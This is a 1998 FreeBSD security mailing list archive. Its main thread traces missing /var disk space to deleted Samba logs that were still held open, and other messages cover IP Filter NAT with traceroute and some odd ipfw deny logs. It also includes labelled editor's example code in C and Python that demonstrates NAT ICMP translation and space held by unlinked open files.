From: Darren Reed Subject: Re: hidden files question To: jdn@acp.qiv.com (Jay Nelson) Date: Tue, 3 Nov 1998 17:03:31 +1100 (EDT) Cc: security@FreeBSD.ORG In-Reply-To: from "Jay Nelson" at Nov 2, 98 10:56:24 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Jay Nelson, sie said: > > We have an office server running 2.2.7-RELEASE doing DNS, Samba and > mail. We have had several intrusion attempts over the past few weeks > that have failed. Today, /var was showing 50 MB and I could only > account for about 5MB. I could find no hidden files. > > Any combination I've used with find hasn't shown anything. Any ideas > on how I can find the missing 45MB? > > Is there a known benign condition that could account for this? Files still open which have been removed. This is often the case with log files. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 22:19:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA20957 for freebsd-security-outgoing; Mon, 2 Nov 1998 22:19:20 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA20951 for ; Mon, 2 Nov 1998 22:19:18 -0800 (PST) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id WAA08967; Mon, 2 Nov 1998 22:19:10 -0800 (PST) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma008965; Mon Nov 2 22:19:00 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id WAA03913; Mon, 2 Nov 1998 22:19:00 -0800 (PST)
From: Archie Cobbs Message-Id: <199811030619.WAA03913@bubba.whistle.com> Subject: Re: IPFW problems... In-Reply-To: <199811011102.DAA13883@hub.freebsd.org> from Darren Reed at "Nov 1, 98 10:02:10 pm" To: avalon@coombs.anu.edu.au (Darren Reed) Date: Mon, 2 Nov 1998 22:19:00 -0800 (PST) Cc: junkmale@xtra.co.nz, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Darren Reed writes: > > > traceroute/UDP was fixed on the weekend last, the pc (ICMP) version may > > > not yet work. > > > > OK. Good! Can you guess when the other version will work? > > My testing shows "traceroute -I" to work properly with NAT. Normal traceroute should work through address translation, assuming you're translating UDP packets as well as TCP. If it doesn't, then the translation engine is not properly "reverse translating" the inner packet in ICMP unreachable messages (as it should). -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 22:22:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA21417 for freebsd-security-outgoing; Mon, 2 Nov 1998 22:22:07 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.nostrum.com (nostrum-gw.cy-net.net [206.28.0.58]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA21402 for ; Mon, 2 Nov 1998 22:22:03 -0800 (PST) (envelope-from pckizer@nostrum.com) Received: from mail.nostrum.com (pckizer@localhost [127.0.0.1]) by mail.nostrum.com (8.9.0/8.9.0) with ESMTP id AAA03417; Tue, 3 Nov 1998 00:21:28 -0600 
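[Editor's added example, placed between the messages of the thread. It is not IP Filter's code, not any real NAT implementation, and not code posted by a participant; it shows the point Archie Cobbs makes above in working C: a toy NAT that translates a UDP traceroute probe outbound, receives the router's ICMP time-exceeded, and either does or does not rewrite the quoted IP/UDP header back to what the private host sent. The addresses (10.0.0.5 behind 203.0.113.1, router 198.51.100.1, target 192.0.2.1), the port allocation from 61000 upwards and the option-free IPv4 layout are assumptions made for the example; the acceptance check at the end mirrors the source/destination port comparison traceroute(8) makes on each ICMP error it receives.]

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Minimal IPv4 (no options) / UDP / ICMP layouts, handled as byte offsets. */
#define IP_HLEN   20
#define UDP_HLEN  8
#define ICMP_HLEN 8
#define PROBE_LEN (IP_HLEN + UDP_HLEN)               /* what the router quotes back */
#define ERR_LEN   (IP_HLEN + ICMP_HLEN + PROBE_LEN)  /* outer IP + ICMP + quote */
#define NAT_PUBLIC_IP 0xCB007101u                    /* 203.0.113.1, assumed public side */

struct nat_entry { uint32_t priv_ip; uint16_t priv_port, pub_port; };
static struct nat_entry nat_table[16];
static int nat_count;

static uint16_t get16(const uint8_t *p) { return (uint16_t)(p[0] << 8 | p[1]); }
static uint32_t get32(const uint8_t *p) { return (uint32_t)get16(p) << 16 | get16(p + 2); }
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }

/* RFC 1071 checksum; over a header whose checksum field is already right it yields 0. */
static uint16_t csum(const uint8_t *p, size_t n) {
    uint32_t s = 0;
    for (size_t i = 0; i + 1 < n; i += 2) s += get16(p + i);
    if (n & 1) s += (uint32_t)p[n - 1] << 8;
    while (s >> 16) s = (s & 0xffff) + (s >> 16);
    return (uint16_t)~s;
}
static void ip_fix_csum(uint8_t *ip) { put16(ip + 10, 0); put16(ip + 10, csum(ip, IP_HLEN)); }
static void icmp_fix_csum(uint8_t *ic, size_t n) { put16(ic + 2, 0); put16(ic + 2, csum(ic, n)); }

/* A traceroute probe: UDP to a high port with a small TTL (UDP checksum left 0 = none). */
static void build_udp_probe(uint8_t *b, uint32_t sip, uint32_t dip, uint16_t sp, uint16_t dp, uint8_t ttl) {
    memset(b, 0, PROBE_LEN);
    b[0] = 0x45; put16(b + 2, PROBE_LEN); b[8] = ttl; b[9] = 17;   /* 17 = UDP */
    put32(b + 12, sip); put32(b + 16, dip);
    put16(b + IP_HLEN, sp); put16(b + IP_HLEN + 2, dp); put16(b + IP_HLEN + 4, UDP_HLEN);
    ip_fix_csum(b);
}

/* Outbound: source becomes the public address plus a fresh port (61000 up, assumed). */
static void nat_outbound_udp(uint8_t *b) {
    struct nat_entry e = { get32(b + 12), get16(b + IP_HLEN), (uint16_t)(61000 + nat_count) };
    nat_table[nat_count++] = e;
    put32(b + 12, NAT_PUBLIC_IP); put16(b + IP_HLEN, e.pub_port);
    ip_fix_csum(b);
}

/* Router side when the TTL expires: ICMP type 11 to the probe's source, quoting the
 * probe's IP header plus 8 bytes of payload (RFC 792), i.e. the *translated* probe. */
static void build_icmp_time_exceeded(uint8_t *out, uint32_t router_ip, const uint8_t *probe) {
    uint8_t *icmp = out + IP_HLEN;
    memset(out, 0, ERR_LEN);
    out[0] = 0x45; put16(out + 2, ERR_LEN); out[8] = 64; out[9] = 1;   /* 1 = ICMP */
    put32(out + 12, router_ip); put32(out + 16, get32(probe + 12));
    icmp[0] = 11; memcpy(icmp + ICMP_HLEN, probe, PROBE_LEN);
    icmp_fix_csum(icmp, ICMP_HLEN + PROBE_LEN);
    ip_fix_csum(out);
}

/* Inbound ICMP error: the mapping is keyed by the quoted datagram's (public) source.
 * The outer destination always goes back to the private host; only with reverse_inner
 * is the quoted header rewritten too, the step a UDP/TCP-only NAT forgets. */
static int nat_inbound_icmp_error(uint8_t *b, int reverse_inner) {
    uint8_t *inner = b + IP_HLEN + ICMP_HLEN;
    if (get32(inner + 12) != NAT_PUBLIC_IP || inner[9] != 17) return 0;
    for (int i = 0; i < nat_count; i++) {
        if (nat_table[i].pub_port != get16(inner + IP_HLEN)) continue;
        put32(b + 16, nat_table[i].priv_ip);
        if (reverse_inner) {
            put32(inner + 12, nat_table[i].priv_ip); put16(inner + IP_HLEN, nat_table[i].priv_port);
            ip_fix_csum(inner); icmp_fix_csum(b + IP_HLEN, ICMP_HLEN + PROBE_LEN);
        }
        ip_fix_csum(b);
        return 1;
    }
    return 0;
}

/* traceroute(8)'s test on each ICMP error: my UDP source port and the destination
 * port of the probe I am waiting on, else the error is ignored ("*"). */
static int traceroute_accepts(const uint8_t *err, uint32_t target, uint16_t ident, uint16_t dport) {
    const uint8_t *inner = err + IP_HLEN + ICMP_HLEN;
    return inner[9] == 17 && get32(inner + 16) == target
        && get16(inner + IP_HLEN) == ident && get16(inner + IP_HLEN + 2) == dport;
}

/* One hop end to end: 1 if the host's traceroute would print the router, 0 for "*". */
static int scenario(int reverse_inner) {
    const uint32_t host = 0x0A000005u, target = 0xC0000201u, router = 0xC6336401u;
    const uint16_t ident = 0x8ABC, dport = 33434;   /* traceroute: pid|0x8000, 33434+seq */
    uint8_t probe[PROBE_LEN], err[ERR_LEN];
    nat_count = 0;
    build_udp_probe(probe, host, target, ident, dport, 1);
    nat_outbound_udp(probe);                        /* leaves as 203.0.113.1:61000 */
    build_icmp_time_exceeded(err, router, probe);   /* router quotes the translated probe */
    if (!nat_inbound_icmp_error(err, reverse_inner) || get32(err + 16) != host) return 0;
    if (csum(err, IP_HLEN) || csum(err + IP_HLEN, ICMP_HLEN + PROBE_LEN)) return 0; /* bad sums are dropped */
    return traceroute_accepts(err, target, ident, dport);
}

int main(void) {
    printf("quoted header reverse-translated: %s\n", scenario(1) ? "hop reported" : "* * *");
    printf("quoted header left alone:         %s\n", scenario(0) ? "hop reported" : "* * *");
    return 0;
}
```

Run as written, the first line reports the hop and the second prints "* * *": with the quoted header left untranslated the error does reach the host, but it names a source port (61000) the host never used, so traceroute discards it as somebody else's. The ICMP checksum has to be recomputed after the rewrite, since a receiving stack drops ICMP with a bad checksum before any application sees it; the quoted IP header's checksum is refreshed as well for tools that validate it.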
From: Philip Kizer To: Jay Nelson cc: security@FreeBSD.ORG Subject: Re: hidden files question In-reply-to: Your message of "Mon, 02 Nov 1998 22:56:24 CST." Date: Tue, 03 Nov 1998 00:21:28 -0600 Message-ID: <3413.910074088@mail.nostrum.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jay Nelson wrote: >We have an office server running 2.2.7-RELEASE doing DNS, Samba and >mail. We have had several intrusion attempts over the past few weeks >that have failed. Today, /var was showing 50 MB and I could only >account for about 5MB. I could find no hidden files. > >Any combination I've used with find hasn't shown anything. Any ideas >on how I can find the missing 45MB? > >Is there a known benign condition that could account for this? Paranoia is good; but, yes, there is a possible benign condition. I haven't seen fuser available, but you can always use lsof (/usr/ports/sysutils/lsof) to see if there are any processes that have open files in that filesystem that have been unlinked but not closed (A program, perhaps syslog, has open a logfile that was unlinked [via unlink(2) or rm(1) that calls unlink(2)], but not HUPped or otherwise told to close the open file that no longer has a directory entry pointing to it.) That condition can cause what you are seeing. If that is what you are seeing, then the cause may or may not be so benign, but the condition itself is. Start with lsof to see which files have open files in /var (when you get a NAME output that is only a mount-point, use find with the -inum option on that filesystem to locate a directory entry associated with the open file). If you find programs running with files open in /var but cannot find the file itself, there's your best candidate. If all programs' open files are accounted for and can be found in some directory, then get worried. In that case, you do have good backups, right?
:) -philip To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 22:40:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id WAA24824 for freebsd-security-outgoing; Mon, 2 Nov 1998 22:40:49 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from tok.qiv.com (tok.qiv.com [205.238.142.68]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id WAA24810 for ; Mon, 2 Nov 1998 22:40:46 -0800 (PST) (envelope-from jdn@acp.qiv.com) Received: (from uucp@localhost) by tok.qiv.com (8.8.8/8.8.5) with UUCP id AAA08208; Tue, 3 Nov 1998 00:40:28 -0600 (CST) Received: from localhost (jdn@localhost) by acp.qiv.com (8.8.8/8.8.8) with SMTP id AAA02470; Tue, 3 Nov 1998 00:37:49 -0600 (CST) (envelope-from jdn@acp.qiv.com) Date: Tue, 3 Nov 1998 00:37:49 -0600 (CST) 
From: Jay Nelson To: Brett Glass cc: security@FreeBSD.ORG Subject: Re: hidden files question In-Reply-To: <4.1.19981102223232.0470a100@127.0.0.1> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Nov 1998, Brett Glass wrote: >Look in logs that have turned over. You may see lots of messages >related to intrusion attempts. We did. I couldn't find any unexplainable successful connections unless they got a password and hacked something I'm not logging. Saw lots of attempts, though. Still, the unaccounted file usage makes me suspicious. What is the whiteout file attribute and how can I find it? The -W flag to ls doesn't seem to work. -- Jay To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 2 23:14:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA28692 for freebsd-security-outgoing; Mon, 2 Nov 1998 23:14:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from henry.cs.adfa.oz.au (henry.cs.adfa.oz.au [131.236.21.158]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA28680 for ; Mon, 2 Nov 1998 23:14:02 -0800 (PST) (envelope-from wkt@henry.cs.adfa.oz.au) Received: (from wkt@localhost) by henry.cs.adfa.oz.au (8.7.5/8.7.3) id SAA08483; Tue, 3 Nov 1998 18:14:05 +1100 (EST)
From: Warren Toomey Message-Id: <199811030714.SAA08483@henry.cs.adfa.oz.au> Subject: Re: hidden files question To: jdn@acp.qiv.com (Jay Nelson) Date: Tue, 3 Nov 1998 18:14:04 +1100 (EST) Cc: security@FreeBSD.ORG In-Reply-To: from Jay Nelson at "Nov 2, 98 10:56:24 pm" Reply-To: wkt@cs.adfa.oz.au X-Mailer: ELM [version 2.4ME+ PL22 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article by Jay Nelson: > that have failed. Today, /var was showing 50 MB and I could only > account for about 5MB. I could find no hidden files. > Any combination I've used with find hasn't shown anything. Any ideas > on how I can find the missing 45MB? > Is there a known benign condition that could account for this? If a process holds a file open, and you remove the file, then the directory entry is removed, but the file's inode and its contents still take space on the disk. You have to convince whichever process to close the file. Alternatively, you have to kill off the process, or shut the system down (at worst). Cheers, Warren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 3 00:17:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA04461 for freebsd-security-outgoing; Tue, 3 Nov 1998 00:17:07 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.224.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA04448 for ; Tue, 3 Nov 1998 00:17:04 -0800 (PST) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199811030817.AAA04448@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA263881001; Tue, 3 Nov 1998 19:16:41 +1100 
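[Editor's added example, placed between the messages of the thread. It is not code from any participant; it reproduces the condition Darren Reed, Philip Kizer and Warren Toomey describe above and shows how to confirm it: a "daemon" holds a log file open, the name is removed, and fstat(2) plus a find -inum style walk are consulted before and after the unlink. The scratch directory under /tmp, the file name daemon.log and the 1 MiB size are assumptions made for the example. On a live system the equivalent check is `lsof +L1 /var` (open files whose link count is below 1) followed by `find /var -xdev -inum N` for each inode it lists, which is what find_inum() below imitates.]

```c
#define _XOPEN_SOURCE 700   /* mkdtemp(3), lstat(2) on glibc */
#include <sys/stat.h>
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Walk `dir` looking for a directory entry whose inode number is `ino`, the way
 * `find /var -xdev -inum N` does.  Returns 1 and fills `path` if one exists, 0 if the
 * inode has no name left under `dir`. */
static int find_inum(const char *dir, ino_t ino, char *path, size_t pathlen) {
    DIR *d = opendir(dir);
    struct dirent *e;
    int found = 0;
    if (d == NULL) return 0;
    while (!found && (e = readdir(d)) != NULL) {
        char p[4096];
        struct stat st;
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0) continue;
        snprintf(p, sizeof p, "%s/%s", dir, e->d_name);
        if (lstat(p, &st) != 0) continue;
        if (st.st_ino == ino) { snprintf(path, pathlen, "%s", p); found = 1; }
        else if (S_ISDIR(st.st_mode)) found = find_inum(p, ino, path, pathlen);
    }
    closedir(d);
    return found;
}

struct held_file {
    ino_t ino; nlink_t nlink; off_t size; blkcnt_t blocks;
    int visible_before;   /* find_inum hit while the name existed */
    int visible_after;    /* ... and after unlink(2), descriptor still open */
};

/* Reproduce the condition: a "daemon" keeps a log open and someone removes the name.
 * Writes `size` bytes to a file in a scratch directory (an assumption: /tmp), unlinks
 * it while the descriptor is still open, and records what fstat(2) and the inode
 * search say.  Returns 1 if the classic symptom was observed (link count 0, size and
 * blocks still charged, no directory entry), 0 if not, -1 on error. */
static int held_space_demo(size_t size, struct held_file *out) {
    struct held_file h;
    struct stat st;
    char dir[] = "/tmp/heldspace.XXXXXX", file[64], where[4096], buf[4096];
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(file, sizeof file, "%s/daemon.log", dir);
    int fd = open(file, O_CREAT | O_WRONLY | O_TRUNC, 0600);
    if (fd < 0) { rmdir(dir); return -1; }
    memset(buf, 'x', sizeof buf);
    for (size_t w = 0; w < size; w += sizeof buf) {
        size_t n = size - w < sizeof buf ? size - w : sizeof buf;
        if (write(fd, buf, n) != (ssize_t)n) { close(fd); unlink(file); rmdir(dir); return -1; }
    }
    fstat(fd, &st);
    h.ino = st.st_ino;
    h.visible_before = find_inum(dir, st.st_ino, where, sizeof where);
    unlink(file);             /* the name is gone: ls, du and find no longer see it */
    fstat(fd, &st);           /* but the inode lives on while a descriptor is open */
    h.nlink = st.st_nlink; h.size = st.st_size; h.blocks = st.st_blocks;
    h.visible_after = find_inum(dir, st.st_ino, where, sizeof where);
    close(fd);                /* last reference dropped: only now is the space freed */
    rmdir(dir);
    if (out) *out = h;
    return h.nlink == 0 && (size_t)h.size == size && h.visible_before && !h.visible_after;
}

int main(void) {
    struct held_file h = {0};
    int r = held_space_demo(1 << 20, &h);
    printf("symptom=%d inode=%llu nlink=%lu size=%lld blocks=%lld named before/after=%d/%d\n",
           r, (unsigned long long)h.ino, (unsigned long)h.nlink, (long long)h.size,
           (long long)h.blocks, h.visible_before, h.visible_after);
    return r == 1 ? 0 : 1;
}
```

When held_space_demo() returns 1 the link count is 0, the size and blocks are still charged to the filesystem, and nothing under the directory carries that inode number: the same shape as 45 MB that du cannot find but df still counts. Closing the descriptor, which is what HUPping or restarting the daemon achieves, is what finally releases the space.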
From: Darren Reed
Subject: Re: IPFW problems...
To: junkmale@xtra.co.nz
Date: Tue, 3 Nov 1998 19:16:41 +1100 (EDT)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <199811022300.MAA19467@cyclops.xtra.co.nz> from "Dan Langille" at Nov 3, 98 12:00:24 pm

In some mail from Dan Langille, sie said:

> On 1 Nov 98, at 22:02, Darren Reed wrote:
>
> > In some mail from Dan Langille, sie said:
> > >
> > > On 29 Oct 98, at 21:45, Darren Reed wrote:
> > >
> > > > traceroute/UDP was fixed on the weekend last, the pc (ICMP) version
> > > > may not yet work.
> > >
> > > OK. Good! Can you guess when the other version will work?
> >
> > My testing shows "traceroute -I" to work properly with NAT.
>
> I'm not sure what "traceroute -I" does. I see no such option on
> traceroute for FreeBSD 2.2.7.
>
> As for my traceroute problems, my mind is unclear. I admit that I didn't
> take full notes. As such, I supply the following in the hopes that it may
> trigger something when you read it. If it does not, then I will reinstall
> IP Filter and get the full story.
>
> I'm using IP Filter 3.2.9 under FreeBSD 2.2.7 RELEASE.
>
> I believe I was able to traceroute when using NAT and without any deny
> rules. When I tried to add in the example firewall rules (from
> rules/BASIC_2.FW), I found that disabling the following rule allowed
> traceroute to work:
>
> block in log quick all with short
>
> When this rule was present, traceroute did not work at all.

Well, for whatever reason, I also appear to have licked this one in the most recent beta (3.2.10beta6) which I'm hoping to get out of beta RSN with as many of the niggling problems people are experiencing fixed as possible.

I'm not sure why it should have been a problem, however, since that should (only) match tiny fragments.
Darren

From owner-freebsd-security Tue Nov 3 00:24:07 1998
Message-ID: <363EBD86.74C9F6E2@sovlink.ru>
Date: Tue, 03 Nov 1998 11:23:34 +0300
From: Alla Bezroutchko
To: security@FreeBSD.ORG
Subject: Is it an attack? Strange things logged by ipfw.

I have an ipfw-based firewall and noticed peculiar connections in its logs. Maybe this is some new kind of attack? Any comments appreciated. Here are the logs:

Nov 3 00:44:53 buddy /kernel: ipfw: 65534 Deny TCP a.b.c.d:50818 aaa.aaa.aaa.aaa:1333 in via ex0
Nov 3 01:12:51 buddy /kernel: ipfw: 65534 Deny TCP e.f.g.h:50818 aaa.aaa.aaa.aaa:1565 in via ex0
Nov 2 11:15:37 buddy /kernel: ipfw: 65534 Deny TCP i.j.k.l:50818 aaa.aaa.aaa.aaa:1725 in via ex0
Oct 20 04:20:03 buddy /kernel: ipfw: 65534 Deny TCP m.n.o.p:50818 aaa.aaa.aaa.aaa:2349 in via ex0
Oct 20 09:22:35 buddy /kernel: ipfw: 65534 Deny TCP q.r.s.t:50818 aaa.aaa.aaa.aaa:1493 in via ex0
Oct 19 04:35:01 buddy /kernel: ipfw: 65534 Deny TCP u.v.w.x:50818 aaa.aaa.aaa.aaa:2465 in via ex0

aaa.aaa.aaa.aaa is an IP address from my subnet that wasn't assigned to any host at the time these logs span. We have DHCP, so there may have been a machine that had this IP once, but now it is free. a.b.c.d - u.v.w.x are various hosts from all over the net, all different. Some university machines, some belong to businesses. Routing is blocked on the firewall so these packets are probably not replies to anything (especially because there is no such host - aaa.aaa.aaa.aaa). I have no address translation.

What stumbles me is why they all use the same source port. Searched yahoo for it, didn't find anything.

Thanks, Alla.
From owner-freebsd-security Tue Nov 3 00:24:40 1998
Message-Id: <199811030824.VAA21281@witch.xtra.co.nz>
From: "Dan Langille"
Organization: DVL Software Limited
To: Darren Reed
Date: Tue, 3 Nov 1998 21:24:20 +1300
Subject: Re: IPFW problems...
Reply-To: junkmale@xtra.co.nz
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <199811030816.VAA26113@predator.xtra.co.nz>
References: <199811022300.MAA19467@cyclops.xtra.co.nz> from "Dan Langille" at Nov 3, 98 12:00:24 pm

On 3 Nov 98, at 19:16, Darren Reed wrote:

> In some mail from Dan Langille, sie said:
> >
> > As for my traceroute problems, my mind is unclear. I admit that I
> > didn't take full notes. As such, I supply the following in the hopes
> > that it may trigger something when you read it. If it does not, then I
> > will reinstall IP Filter and get the full story.
> >
> > I'm using IP Filter 3.2.9 under FreeBSD 2.2.7 RELEASE.
> >
> > I believe I was able to traceroute when using NAT and without any deny
> > rules. When I tried to add in the example firewall rules (from
> > rules/BASIC_2.FW), I found that disabling the following rule allowed
> > traceroute to work:
> >
> > block in log quick all with short
> >
> > When this rule was present, traceroute did not work at all.
>
> Well, for whatever reason, I also appear to have licked this one in the
> most recent beta (3.2.10beta6) which I'm hoping to get out of beta RSN
> with as many of the niggling problems people are experiencing fixes as
> possible.
>
> I'm not sure why it should have been a problem, however, since
> that should (only) match tiny fragments.

Well, if it's any help, I'm willing to test with any beta objects you're willing to let me have.

cheers.
-- Dan Langille
The FreeBSD Diary
http://www.FreeBSDDiary.com/freebsd

From owner-freebsd-security Tue Nov 3 01:05:21 1998
Date: Tue, 3 Nov 1998 11:06:48 +0200 (EET)
From: "Oles' Hnatkevych"
To: Jay Nelson
Cc: security@FreeBSD.ORG
Subject: Re: hidden files question

On Mon, 2 Nov 1998, Jay Nelson wrote:

> Any combination I've used with find hasn't shown anything. Any ideas
> on how I can find the missing 45MB?

I would do 'cd /var; du -k -d 1'.

Best wishes,
Oles Hnatkevych, http://gnut.kiev.ua

From owner-freebsd-security Tue Nov 3 06:13:02 1998
Date: Tue, 3 Nov 1998 09:11:36 -0500 (EST)
From: Barrett Richardson
To: "Oles' Hnatkevych"
Cc: Jay Nelson, security@FreeBSD.ORG
Subject: Re: hidden files question

On Tue, 3 Nov 1998, Oles' Hnatkevych wrote:

> On Mon, 2 Nov 1998, Jay Nelson wrote:
>
> > Any combination I've used with find hasn't shown anything. Any ideas
> > on how I can find the missing 45MB?
>
> I would do 'cd /var; du -k -d 1'.

Yeah, and if there is a big discrepancy between df and du you might could (as a drastic measure) shut the machine off, run fsck on /var, and see if said unaccounted-for usage appears in lost+found.

You may be able to accomplish the same on a live file system (ask -hackers).

> Best wishes,
>
> Oles Hnatkevych, http://gnut.kiev.ua

From owner-freebsd-security Tue Nov 3 06:45:05 1998
To: Jay Nelson
Cc: security@FreeBSD.ORG
From: "Gary Palmer"
Subject: Re: hidden files question
In-Reply-To: Your message of "Mon, 02 Nov 1998 22:56:24 CST."
Date: Tue, 03 Nov 1998 09:44:37 -0500
Message-ID: <11630.910104277@gjp.erols.com>

Jay Nelson wrote in message ID :

> Is there a known benign condition that could account for this?

Try running fstat & friends to see if there is a file held open on /var. It's possible that a program opened up a file and it somehow got unlinked (a nightly tidy-up cron?) but the file is still held open. So it's not visible via any directory, but it's still there.

Gary

--
Gary Palmer, FreeBSD Core Team Member
FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info

From owner-freebsd-security Tue Nov 3 07:25:51 1998
Date: Tue, 3 Nov 1998 17:24:20 +0200 (EET)
From: Narvi
To: Barrett Richardson
Cc: "Oles' Hnatkevych", Jay Nelson, security@FreeBSD.ORG
Subject: Re: hidden files question

On Tue, 3 Nov 1998, Barrett Richardson wrote:

> On Tue, 3 Nov 1998, Oles' Hnatkevych wrote:
>
> > On Mon, 2 Nov 1998, Jay Nelson wrote:
> >
> > > Any combination I've used with find hasn't shown anything. Any ideas
> > > on how I can find the missing 45MB?
> >
> > I would do 'cd /var; du -k -d 1'.
>
> Yeah, and if there is a big discrepancy between df and du you
> might could (as a drastic measure) shut the machine off, run fsck
> on /var, and see if said unaccounted for usage appears in lost+found.
>
> You may be able to accomplish the same on a live file system (ask
> -hackers).

And one could use du -a to see whether there were no files that ls was told not to show...

Sander

There is no love, no good, no happiness and no future - all these are just illusions.
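The mechanism Warren and Gary describe above (a deleted file that a process still holds open keeps its blocks, so df keeps counting them while du and find cannot see them) can be reproduced in a few lines. The following is an added example written for this archive, not code from any of the posters: it creates a file, keeps a descriptor open, unlinks it, and reports what a du-style directory walk sees against what the open descriptor still reaches. The file name `log.smbd` is a constructed stand-in for a daemon's log; the `/proc/self/fd` scan is Linux-specific (on FreeBSD the same information comes from `fstat`, as Gary suggests), so the function returns `None` where `/proc` is absent.

```python
"""Why df and du disagree when a deleted file is still held open.

Added example, not from the thread. Creates a file, keeps it open, unlinks
it, and compares what a directory walk sees with what the descriptor holds.
"""
import os
import tempfile


def du_bytes(path):
    """Sum the sizes of every directory entry under path (what du can count)."""
    total = 0
    for root, _dirs, files in os.walk(path):
        for name in files:
            total += os.lstat(os.path.join(root, name)).st_size
    return total


def deleted_open_files():
    """(fd, target) pairs for this process's descriptors whose file was unlinked.

    Uses the Linux "(deleted)" marker on /proc/self/fd links; returns None
    where /proc is not available (FreeBSD: use fstat(1) instead).
    """
    fd_dir = "/proc/self/fd"
    if not os.path.isdir(fd_dir):
        return None
    found = []
    for entry in os.listdir(fd_dir):
        try:
            target = os.readlink(os.path.join(fd_dir, entry))
        except OSError:
            continue  # descriptor closed between listdir and readlink
        if target.endswith(" (deleted)"):
            found.append((int(entry), target))
    return found


def held_open_after_unlink(size=1 << 20):
    """Create, fill, unlink and keep open a file; report what each view sees."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed name: stands in for a log file a daemon keeps open.
        path = os.path.join(d, "log.smbd")
        fd = os.open(path, os.O_WRONLY | os.O_CREAT, 0o600)
        buf = memoryview(b"x" * size)
        while buf:  # os.write may write fewer bytes than asked; loop until done
            buf = buf[os.write(fd, buf):]
        du_before = du_bytes(d)

        os.unlink(path)   # the directory entry goes; the inode does not
        st = os.fstat(fd)  # the open descriptor still reaches the inode
        result = {
            "du_before_rm": du_before,
            "du_after_rm": du_bytes(d),      # the walk can no longer see it
            "held_open_bytes": st.st_size,   # but its blocks are still allocated
            "link_count": st.st_nlink,       # 0: no name left, only open descriptors
            "deleted_fds": deleted_open_files(),
        }
        os.close(fd)  # last reference dropped; only now is the space given back
        return result


if __name__ == "__main__":
    for key, value in held_open_after_unlink().items():
        print(f"{key}: {value}")
```

Run as a script it prints `du_after_rm: 0` next to `held_open_bytes: 1048576` and `link_count: 0`, which is exactly the shape of Jay's 5 MB versus 50 MB discrepancy: the only way to get the space back is to have the owning process close the descriptor (restart or HUP the daemon), or reboot.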
From owner-freebsd-security Tue Nov 3 14:10:10 1998
Date: Tue, 3 Nov 1998 15:50:07 -0600 (CST)
From: Jay Nelson
To: security@FreeBSD.ORG
Subject: End of hidden files question
In-Reply-To: <11630.910104277@gjp.erols.com>

Thanks to everyone. Turns out, it was open Samba logs that I'd deleted over time. I'm ashamed to admit, I did it to myself. Killing the parent smbd seems to solve the problem with the usual wailing from users. Rebooting definitely worked.

